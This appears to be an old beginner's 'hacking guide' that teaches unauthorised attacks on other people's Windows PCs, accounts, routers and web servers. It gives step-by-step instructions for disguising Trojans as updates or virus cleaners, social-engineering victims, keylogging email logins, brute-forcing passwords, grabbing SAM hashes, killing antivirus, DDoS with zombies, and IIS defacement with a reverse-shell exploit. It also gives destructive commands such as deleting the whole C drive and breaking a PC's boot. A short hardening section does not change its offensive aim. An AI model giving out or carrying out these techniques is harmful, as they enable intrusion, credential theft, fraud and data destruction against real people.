Académique Documents
Professionnel Documents
Culture Documents
By
Hacking
A complete guide to beginners, those who want to learn how to utilize there Power of
mind in the challenging world. (Just for Pakistanis)
Saqibsworld1@yahoo.com
Or Contact at:-
Muhammad Saqib
Pakistan
(03455382062)
4. Don’t try to use those software to which you do not know “how
to use” them.
7. Don’t create yours own hacking software but try to use someone
else (third party) software because it can require less experience
and prevents you from wastage of time. The important thing is
you should know the techniques I say it “How to hack” means
basic knowledge of hacking. And not on the software.
8) IP addresses, understanding it
15) Connecting to MIRC/KAZAA/ICQ through a firewall that has certain ports blocked
with a SOCKS server
19) Cracking a user account locally or remotely - brute force or dictionary attack -
Win2K and WinXP
What do I need to be able to hack? - Firstly you need to understand how your computers
operating system works, networks and protocols works, security settings and general PC
knowledge. After you understand how it works you need hacking tools which helps you
to hack.
What is command prompt (cmd- the little dos Windows)? - Go START, RUN and type in:
"cmd" and then press enter command prompt of cmd windows will be in front of urs
screen.
What can I do in cmd? - You can do various things with it like run exploits or do a ping
request.
Why does some of the hacking tools I download just close itself when I open them? -
Lot's of hacking tools are DOS based and has to be run through CMD. If you double click
on the program it will open a DOS box and automatically close the box. From CMD you
can navigate to the directory which your hacking tool is stored in and run it from there.
What is a IP address? - Every computer connected to the Internet or some network has a
IP address. Go to START, RUN and type in "cmd" then type in "ipconfig" it will show
you your IP address or addresses. It will look something like this: 81.35.99.84.
How do I find someone's IP address? - Look further down in this book and use
IPSTEALER
What can I do with a IP? - Well you need someone's IP before you can hack, port scan or
DOS them.
What is IP ping? - It's a command you can use to check if someone's IP address is online,
to check it they connected to the Internet or a network. In command prompt type in "ping
192.168.0.21" - this will show you something like this:
That means you can successfully PING IP 192.168.0.21 which means the IP is online. If
you get a message "request timed out" it means the IP is not online.
Why can't I ping a certain IP? - Either the IP is not online/ in use or the person you’re
trying to ping is running a firewall which blocks ping requests or maybe your firewall is
blocking outgoing ping requests
Why do I have two IP addresses when I do a ipconfig? - Well if you’re on a local LAN
(Local area network) you will have an IP like 192.168.0.1. If you’re also directly
connected to the internet you will have another IP address like 80.87.34.56. 192.168.0.1
Is your local IP which you use to communicate with your local internet network (LAN)
and 80.87.34.56 is your internet IP.
What is a static and dynamic IP address? - Static means permanent set IP address - like a
website will have a static IP address, it never changes. Dynamic means temporary IP
address - dialing up to the Internet with a modem or most ADSL connections has
dynamic IP's. Every time you logon to the Internet your ISP (Internet Service Provider)
will issue you a new IP address.
I have sent someone a Trojan but I cannot connect to their PC? - Either they are running a
firewall which blocks you from connecting to their PC, or they are connected to the
internet through a router.
What do I do when someone is behind a router and I want to control their PC with a
Trojan? - You will need to use a Trojan which uses reverse connections - meaning you
don't connect to the host, the host connects to you. Bifrost is a Trojan which has the
mentioned function. Remember when someone is behind a router and you’re using
IPstealer to get hold of their IP address, you are actually getting their routers IP, not their
actual PC's IP. The router will have the person’s internet IP (WAN IP) and their PC will
have a different IP - their LAN IP.
How do I check if my own PC is infected with a Trojan? - Do a port scan on your PC and
check which ports are open. If you find any open ports in this Trojan port list you might
be infected with a Trojan. Download the Trojan you think you might be infected with and
connect to that specified port.
What is a router? - A device which is used to route data on a network. A Router decides
where certain traffic should be sent to.
What is a firewall? - Its a software or hardware device which can block or permit certain
ports or IP's or certain kinds of data.
What is a port and what can I do with it? - Every program running on your PC which has
some network function uses a specific port to send and receive data though. If you do a
port scan you will see which ports are open on the host you scanned. Port 80 is normally
a web server. Port 21 a FTP server etc. Trojans also uses ports. Check this list of Trojan
ports, if you find an open port in this list, the host might be infected with a Trojan,
download the Trojan and try connecting to the port.
How do I do a port scan? - You need a program like superscan to do a portscan. Then all
you do is add the IP you want to scan.
Why do you want to scan ports? - If you scan a PC with a port scanner, it will show you
which programs or services are running on the PC.
Common ports:
Ping : 7
Systat : 11
Time : 13
NetStat :
15
SSH : 22
Telnet : 23
SMTP : 25
Whois : 43
Finger : 79
HTTP : 80
POP : 110
What is a exploit? - It's a poorly coded piece in software which you can use to gain access
to the system. There is many exploits available for the various MS Windows's out there.
How do I use a exploit? - You first need to compile the exploit with a program like
Bloodshed C++ compiler. Then you can start the exploit through command prompt and
see if the system you’re trying to exploit is vulnerable to that specific exploit. Scroll
down for more information about exploits.
What is a exploit POC? - POC stands for proof of concept and it the proof that an exploit
works.
What is a DOS attack? - It is when too much data is being sent to a host and it cannot
handle all the data and disconnects from the Internet.
How do I see what connections is currently made to my PC? - In cmd type in "NetStat" -
it will show you IP addresses of connections to your PC and what port it is using.
What is a MAC address? - Its a hard coded number, almost like a name which is
embedded into a network card. It identifies the manufacturer of the card and a unique
number for the card. No two network cards in the world have the same MAC address.
e in "ipconfig /all"
Someone else's MAC address you need their IP address and then go to cmd and type in
"nbtstat -a 192.168.0.5" or whatever IP they use. This will show you their MAC address
as well as their currently logged on user.
What is a Windows Registry and how do I access it? - Its where Windows stores most of
the configurations of your operating system and most programs installed. You might use
it to make a Trojan server file you uploaded to the PC run automatically when Windows
starts up. To access the registry go START, RUN and type in "regedit"
Carefully what you change in the registry, it might screw up you PC. First make a backup
of the registry.
How do I hack a webpage/ web server? - Read the IIS hacking tutorial in the MISC
download section on Windows Hacker. Remember not all web servers run IIS!
What is IIS? - It is Microsoft's web server. IIS - Internet information server. Most web
servers run on port 80.
How do I check if a website is running on IIS? - Telnet to the website URL through CMD
- "telnet www.siteyouwanttocheck.com 80"
What is telnet? - Program which can be used to connect to remote computers or routers
and to run commands by simply typing them in its window.
How do I hack into a Gmail, Yahoo or Hotmail email account? - Every now and then
someone discovers a way to get into those email servers, but the service provider fixes
the security hole so fast, there is no straight answer for that. Best way is to install a key
logger on the victims PC and get their login details. Otherwise download THIS program
like mps1.3 for yahoo or brute force which you can use to brute force a hotmail account.
How do I hack into a POP3 email account? - Hydra 5.3 is a program which you can use
to crack POP3 accounts. You will need a wordlist which Hydra will use to crack the
POP3 password.
What is a key logger? - It is a program you install on someone's PC which captures every
key that is pressed on their keyboard which is emailed to you or stored into a file.
How do I get the administrator account password while logged in to the PC? - Locally
run a program like Adminhack for local administrator account cracking. If you need to do
it remotely run a program like Venom or Starbrute.
What is a SAM file? - SAM file is the file which stores all the user accounts and their
password hashes like the Administrator account. SAM file is stored in
"C:\WINDOWS\system32\config" but it is locked and inaccessible while you are busy
using Windows - meaning you can't copy it while you’re in Windows. You need to boot
up with another operating system like NTFSDOS or Linux with NTFS support. When
you copied the SAM file you can crack the passwords stored in the SAM file with a
program like LC5. With Pwdump6 it is possible to get access to the SAM file while
logged into windows. It can also connect to a remote PC and grab the password hashes
from the SAM file. Administrator account is needed.
How do I find out what operating system does my target run? - Download Detect and use
it against your targets IP address. Result:
C:\>detect.exe 127.0.0.1
[*] ------------------------------ [*]
[*] XP/2K OS Detector [*]
[*] by: ill will & phr0stic [*]
[*]------------------------------[*]
[+] Finding Host 127.0.0.1
[+] Connected to 127.0.0.1
Firstly install Win XP with the latest Service pack. Run Windows update (START, ALL
PROGRAMS, and WINDOWS UPDATE) and update Windows and all your device
drivers. Go download all the latest versions of applications you use like FTP server or
proxy or so, old versions of programs is insecure and you could be hacked that way.
Disable the "guest" account on your PC and rename your "administrator" account. Right
click My Computer and choose Manage. Stop any services you don't use, but be careful
not to stop something that u use (RIGHT CLICK MY COMPUTER, CHOOSE
MANAGE, SERVICES AND APPLICATIONS, and SERVICES). Stop the
MESSENGER and REMOTE REGISTERY services. Delete the admin shares, share it as
something else and then stop sharing it. Then when you reboot it will not share it
automatically again. With these admin shares domain admen’s and hackers can access
your PC. Make sure to put a complex password on all your accounts. Make your hard
drive NTFS - it is the file system you format your hard drive with. Put a password on
your BIOS and make sure you change the boot order to boot first with the hard drive, so
someone cannot boot up with a CD, delete your SAM file, or crack its password and gain
administrator access to your PC. Make sure the built in firewall is enabled. Check in
control panel for Windows firewall. This firewall may be the cause that some of your
hacking applications and tools will stop working, so if you have a problem with an
application make sure to add this program to your windows firewall exceptions. Install
some kind of anti virus program, Norton Anti Virus works good, but remember that a lot
of hacking tools are picked up by Anti Virus, so disable your Anti Virus before running
those tools. Also install a Spyware removal tools like Spyware DoctorSpyware is
irritating software which is installed onto your PC through files you download from the
net or WebPages you open which has malicious code in it. It slows down your PC and
might send your information to the Spyware creator.
(3) Using a Trojan / RAT
Trojans is one of the first things you must learn when you want to hack. A Trojan is a
small program you send to someone to infect their PC so you can control their PC, steal
passwords, files or just have some fun. Every Trojan works on a different port, like Sub7,
works on port 27374. If you scan a PC and find that port 27374 is open, it means the
machine is infected with Sub7. Now of course the Trojan can be set with a password, it’s
up to you to crack it then. Now remember that most Trojans are picked up by Anti Virus
software. You need a new released Trojan which AV does not pick up.
The Trojan most people know is Sub7. Before you can start using the Trojan, you first
need a host to infected with a Trojan. A host can be infected in a lot of ways. You can
send the host the Trojan server file, and tell them it's a game or a firewall or whatever you
like it to be. Best is to rename the file to something they will think is useful like:
WindowsXP_update.exe. You can email them this file or put it on a downloads area on a
web page, use your imagination. My Favorite way is to send people a "net send" message
with MSMH and choose a name like NortonAntivirust_Support and tell them their PC
was detected with a virus, please go to
www.yourpagewithtrojanfile.com/Virus_Cleaner_V1.20.exe and run the file to remove
the virus from their PC. Net send only works on NT4 and Win2k and Win XP machines
that's got messenger service enabled. Disable your messenger service; you do not want
people sending you stupid messages. You can also bind the Trojan file with another file,
any executable file the Trojan can be binded to. Always remember to rename the file,
change the program icon and the put a password on the server file. Bind the file with
another file and set the file to automatically delete itself after executed, or set it to give an
system error.
When you infect a host or find a infected host, it's time to connect. Easy way to find
Trojans infect hosts is with Trojan hunter. Choose an IP range to scan through and it will
search for Trojan infected hosts. When you found an infected host, download the Trojan
client from my Trojans page. Connect with the Trojan to the host IP, to the certain port
the Trojan works on and you are ready to take control. Each Trojan uses a diffident port.
Here is a list of ports which a certain Trojan works on.
With most Trojans, you will be able to log keystrokes on a PC, even get logged into a file,
and when the host is online it will email the keystrokes to an specified email address.
Delete or copy files, reboot the PC, make screen captures or disable the screen or mouse.
With Sub7 you can do anything on the infected host, just as if you where sitting in front
of the PC itself.
Important things are remember. A Trojan comes with a file called "server.exe". Never run
that file on your own PC, it will infect your PC with the Trojan! Use the Trojans
configuration file to make changes to the "server.exe" file and then send the file to a
victim.
There is also Trojans which has the option to do a reverse connection. Very useful if the
person sits behind a router or firewall. After your infected the victims PC, the Trojan will
automatically connects to you, thus getting past the problem of connecting through a
router or firewall. Remember that if you do not connect to the Internet directly (with a
modem) and you sit behind a router, you will need to forward the Trojan ports in your
routers configuration if you are doing a reverse connection.
Try out Bifrost RAT or Poison Ivy RAT which can do reverse connections, useful when
the host is behind a router.
Finding PCs with shares over a LAN or over internet is very easy. Choose a certain IP
range and use Netscan to search through the IP range for PCs with shares. A PC can only
have shares if it is connected to a network or has file and printing enabled, so mostly
computers with an network card. If you find a computer with a share, use Windows to
connect to that share. Go START, RUN and type in "\\IP\sharename". Example
"\\198.55.67.244\c" or with the PC name "\\pc1\c" - then you will have access to the
share, to delete, copy or rename files or directories, depending what it was shared as, but
most people share things with full access and no password. If you find a PC with shares,
but when you try and connect to it, it ask you a password, the easy way to crack it is with
PQWak, this program brute force cracks the password for you - Win9X only. Windows
NT/XP, works through permissions, so if something is shared, it is shared with
permissions to the folder, and permissions is given to an user name. But a lot of people
make shares with full access to anyone. Win2K/XP accessing an share like the C$ share
will ask you an username and password, if there is no password specified by the person
who's PC it is. Trying username as Administrator and password blank. Most people got
administrator account password blank, easy way to get onto their shares. Windows 2000
and XP you can use Venom or Starbrute to brute force or dictionary crack local accounts.
If you gain access to someone's hard drive, copy a Trojan server file into their startup
folder, and then when they reboot their PC, the Trojan will run and you will have access
to their PC with the Trojan.
(5) Hacking a PC with a exploit
What is a exploit? It's a poorly coded piece in software which you can use to gain access
to the system. There is many exploits available for the various MS Windows's out there.
Check this page for new exploits: http://www.frsirt.com/exploits/Now if you’re a n00b,
you don't know how to compile an exploit, basically you need some programming
experience, so go learn how to program. Most exploits are written in C++ so try
Bloodshed Dev C++ which you can use to compile exploits. Read this tutorial about
compiling exploits. But you can download exploits which other people has already
compiled. If someone updates their PC when new exploits comes out, you can't exploit
them. But if they don't update and install new patches, the chance you can exploit and
gain access to their PC is big. Check this example of how a exploit works:
This is an exploit for Win2k/XP and it’s already compiled, you can download it by
searching on goolge. This is an explanation of how to use it:
------------------------------------------------------------------------
-------------------------------------------------------------------------
Scan in Progress....
- Connecting to 192.168.1.101
C:\WINNT\system32>
^^
7. Group to admin
^^^
C:\WINNT\system32>exit
Type the password for \\192.168.1.101\C: <--- enter myuser's password here
There you will now have a mapped drive to the target PC and an administrator account.
Nuking was in the Windows 95/ NT4 days. The original WinNuke was for Windows 95.
It attacked the host on port 139 (win95) and port 135 (winNT). Yes someone people still
use Windows 95 and NT4, but not a lot of people. If you find someone by any chance,
use Superkod. I found it works best. Open up the program, type in the IP and Click
NUKE. If the person is using Win95 or WinNT4, and their unpatched, their internet
connection will be dropped or they will get a BSOD.
That's all very well and all, but with a program like KOD, it does not hide your IP from
your attacker. If they are running a firewall, they will see where all this traffic is coming
from and they will see it's YOU. So now, you need to spoof your IP address so the
attacker cannot see who the attack is coming from. For Win2k/XP, I would recommend
using Smurf2k, Nemesy or Jolt that was designed for attacking Win2k, but Jolt does not
spoof the IP so beware, only Smurf2k and Nemesy spoofs the IP. Smurf2k uses a
broadcast list, a list it uses for address to spoof from. So if you attack someone, they will
see IP's attacking them that do not exist. Before you attack someone, find out what
connections he has, because if he wants to attack him with bandwidth, you will need
more than him. So if it is an modem user with no firewall, you will be able to disconnect
him yourself. If it is someone with more bandwidth than you, a firewall or a patched
system, you will need BANDWITH to disconnect him. So gather around a few of your
buddies, give them a DOS tool and all of you guys at the same time attack him. Make
sure you run a firewall that blocks incoming IGMP, ICMP, UDP and TCP incoming
connections if they start attacking back. Heck even better, infect a few hosts on a ADSL
line or a corporate line with a lot of bandwidth, and take down microsoft.com. This is the
part when Zombies comes in. You infect a few hosts (Zombies) and control them to do a
DOS attack on someone. It works almost like a trojan which you infect their PC and take
control of it.
Try Freak88 - it allows you to control a few PC's at the same time and do a DOS attack.
Also try DOS 3 from the DDOS section, it’s a very cool application and there is an
detailed explanation, it also supports spoofing.
So you would like to know someone's PC name, or their MAC address of their network
card or the username that currently logged onto the PC? It can be very useful to have this
info on someone. Their PC name can be their own name or company name. Their MAC
address is the address of their network card, which is static, means that it can never
change. Their username can also be useful if you would like to know this persons name.
All of this can only be retrieved if the person has a network card installed on their PC.
It will show you the PC name, domain name if it is connected to a domain and it will
show the user name logged onto the PC. The MAC is static, meaning it never changes,
useful for identifying someone. Your buddy attacks you, you check his IP and you do a
"nbtstat" on him, and you gets his MAC address. So now if you check on his PC, and see
he has got the same MAC address you know it was him attacking you.
IP spoofing is basically when you attack someone and you use a bogus IP. A DOS attack
or whatever, it attacks the target, but the target only receives data from bogus IP's. IP's
that does not really exist, or it does exist but it is someone else's IP, not yours. Every
network cards has a burned in MAC address. a MAC address looks something like this :
00-40-AH-4E-E0-90, it cannot be changed - well kind of, so if you attack someone and
they do a nbtstat on you, get your MAC address of your network card, it is a simple way
of identifying you as the attacker.
IIS is Microsoft's internet server. It is very buggy and very exploitable. Defacing a IIS
server is actually very easy. A lot of system administrators does not load patches on their
IIS servers so they are the people who gets defaced (hacked). Current IIS servers I will
show u to hack are IIS 4/5. IIS 6 is the industry standard at the moment, but there is still a
lot of IIS4/5 servers online. The way IIS server is being hacked is though buffer
overflows and exploits. This is when a certain code is sent to the server; the server gets
confused and grants you root access to the server. There is a lot of IIS hacking tools
making it easy for anyone to hack an IIS server. Not all web servers are run on IIS; there
is many other web server software out there like Apache. We will only be dealing with
IIS servers.
Firstly you have to find a IIS server. Dreamscape IIS scanner is very useful. It gives you
the option to scan a certain IP or an IP range. It will search and tell you if it finds any IIS
servers, and which version the host is running. Another way is to telnet to the IP on port
80. In dos prompt (Start, Run, and CMD) type in: telnet 196.35.45.21 80. It will open
telnet and show you what IIS the host is running. Web servers normally run on port 80,
but it can be any other specified port. If you find an IIS server, it's time to DEFACE it :)
We will first use Jill-win32 for now. It exploits an IIS5 printer overflow. In dos prompt
(Start, Run) run jill-win32. It will show you this:
Usage: jill-win32 <victim Host> <victim Port> <attacker Host> <attacker Port>
http://www.eEye.com
Exploit sent! Now telnet to www.[yourowncompany].com on port 6969 and you should
get a cmd prompt.
Trying www.[yourowncompany].com...
C:\WINNT\system32>whoami
Windows 95/98 does not react well to the /con/con command. Any Windows 98/95 PC
can be crashed with this /con/con exploit, but you need access to a share on the PC, any
access will work.
<Html>
<Head><title>Crash! </title></head>
<Body>
</body>
</html>
The pcname is the Pcname of the PC you want to crash (or the IP) and the share name is
the share you got access to. When you open the htm file and click on the link, it will crash
(BSOD) the PC.
Now this is something that can really create havoc!!! I tested it on Win9X and Win
NT4 .Does not work on Win2k or Win XP. Beware don't try this on yourself!! Windows
9x and NT 4 has a flaw which allows an remote connection to create undeletable, well
practically undeletable files and directories to be created anywhere on a remote machine.
These files and directories can be deleted, but it takes about 2 minutes to delete through
dos commands. Download NetBIOS Bomber, choose the target and choose which OS and
you ready to makes someone's life hell. Remember if their system is update it will not
work.
Download RA-Anonymous email first. Then choose who u want to send to and from who
u want the email to be from. For this to work you will have to find an SMTP server that
accepts relaying. . So in the server space put in: "smtp.mweb.co.za" - this SMTP worked
at the time I tested it. And your are ready to send someone email from
billgates@microsoft.com!! :) Use OPENRELAYCHECKER by searching at
http://www.google.com download OPENRELAYCHECKER which you can use to search
for email servers that support relaying.
Resetting your Win2K admin password is easy. Boot up with a Win9X boot up disk or
CD. Go to Winnt\system32\config directory. There will be a file called "SAM" Delete
that file and reboot machine. Now the Administrator account password will be reset to
blank (no password). Only works with FAT32 partitions. For Windows XP need this file
which has a few utilities you can use to reset the XP administrator password. Then there
is also a program called Adminhack which you load in a dictionary file to crack the
administrator account if you have local access on the PC.
(15) Connecting to MIRC/KAZAA/ICQ through a
firewall that has certain ports blocked with a SOCKS
server
When you behind a firewall and MIRC, Kazaa or ICQ are blocked you can use a
technique called http tunneling. Basically your program to an program running on your
computer and the programs redirects the data thru HTTP. Download HTTPORT or
SOCK2HTTP. It will run a SOCKS server on your PC which you can use to connect
MIRC, Kazaa or ICQQ or whatever program you want to use that is blocked by the
firewall. In mIRC or Kazaa go to settings and tell the program to connect to your SOCKS
server. Server address is 127.0.0.1 - your local IP and socks port is port 1080.
Let’s say you try and upload a trojan to someone's machine and their anti virus picks it
up. Check if you can get a account on the machine with Administrator rights. If you have
an account like that, you can use PSKILL and kill the anti virus program or firewall. You
can basically kill any program or process running on the machine, but it must be a Win2k
or XP machine. If the person is running Norton anti virus the file will be something like
nav32.exe. Now with pskill the command will be :
Here is a few things u can do to someone to annoy the living hell out of them :)
1) Blue Screen Of Death : Create a batch file "something.bat" and edit the file so it
contains the following (Win9X only)
C:\Aux\Aux
or
C:\Con\Con
2) Deleting the persons whole C drive with this command : Deltree /y c:/*.*
3) Make a screen shot of the persons desktop. put that picture as their background and
hide the start bar and desktop icons. With 2000 and XP, lock the PC and move the
windows out of the way, just check how clever your friend really are. Or put a password
one a screen saver and put the screen saver file into the startup folder. They will have to
boot up into save mode to restore the screen saver.
4) A nice harmless trick, schedule something like a screen saver with a password on a PC
for a certain time, sure to make someone scream.
5) Go to the windows directory and look for a file Win.ini. Edit the file and look for a line
with : shell=Explorer.exe. Change this to something like YOUR PC HAS A VIRUS ON
IT. When the PC gets restarted it will come up with that message and it will not boot up
@ all. Look for system.ini, change the same, shell="explorer.exe to shell=". Bill Gates
Hates You" :)
(19) Cracking a user account locally and remotely - brute force or dictionary attack -
Win2K and WinXP
When you need the password of a account on your local machine or on a remote machine
you can either brute force or dictionary attack the account. Remember this could take
from 1 minute to a few days depending on how complex the password is.
------------------------------------------------------------------------------------------------------
Lbrute is a program which you can use to guess a user account password with a
dictionary attack while logged onto the machine locally.. You will need a wordlist which
Lbrute can use to guess the password. Example of how to use Lbrute:
Starbrute can either be used to crack a user account on your own local PC or it can be
used to crack a user account on a remote PC. Starbrute uses brute force to guess the
password. Meaning it will use Charset: 1234567890abcdefghijklmnopqrstuvwxyz in
random order to guess the password.
▓ Charset: 1234567890abcdefghijklmnopqrstuvwxyz
▓ Start length: 3
▓ Max length: 4
■ Starting...
High means the program will use a lot of resources - the higher the faster it can guess the
password.
With both these programs you can specify any account on a machine - administrator,
guest or whatever.
Remember you can find out what account is logged onto a machine by typing in this
command into CMD: nbtstat -a IP.It will show you the username currently logged on and
then you can try and crack that account password.
Routers are devices which is used to route data on a network, it decides where certain
traffic should be sent to. A router acts as a gateway to the Internet and is use by most
people these days to access the Internet instead of Modems. A client PC could either be
connected to the Router through a LAN cable of with a Wireless card. Routers are mostly
configured though a web based system or with a command prompt window (cmd). Most
home users with ADSL use Routers as their gateway to the Internet. Most Routers are
configured so that it can only be administered though the Web based system when your
are connected to the Routers local network - the internal LAN. Connecting to the Router
you will use your web browser. A typical router IP address would be 192.168.0.1. So this
would be the address to use to connect to the Router though a browser:http://192.168.0.1/
If you are using a Router as your Internet gateway try connecting to it. Remember the
routers IP address could differ from the example above. If you don't know your Routers
IP address goes to command prompt and type in: ipconfig
Your local area connection gateway address will be your Routers IP address. Remember
the Router is your gateway to the Internet. When you are connected to your Router
though the web based system it will ask you a username and password. If you know the
login details use it to log into the Router. If you do not know the login details you can try
the default login details as set by the Router manufacturer. Have a look at this list with
default login details. In your Routers configuration you can set settings which the Router
uses the connect to the Internet, security settings, local LAN configurations, DHCP
settings, port forwarding, statistics and information about the Router status and many
more. Accessing a Router though a command prompt windows can be achieved by going
to command prompt (cmd) and typing in:
telnet 192.168.0.1 23
23 is the port which the Router will be access with. You can access someone else's Router
over the Internet, login and change settings or even steal their ISP (internet service
provider) details. When you Telnet to a Router and it bring up the login screen it
sometimes will show you what make and model the Router is. Then check the default
password list and see if you can login with those default login details and obtain access to
the Router. If the person who's Router it is has not changed the Router's default login
details you should be able to access the Router easily. Most home users do not change the
default passwords. When you access someone else's Router over the Internet, you can
change settings, forward ports, reset the Router or even steal their ISP (internet service
provider) details. Telnetting to a Marconi ADSL Router with the CX82310 chip from
Conexant on port 23 will give the following output:
LOGIN PASSWORD>
And logging into the Router will bring up the main menu:
MAIN MENU
2. ADSL MENU
4. REMOTE LOGON
Q. LOGOUT
ENTER CHOICE-->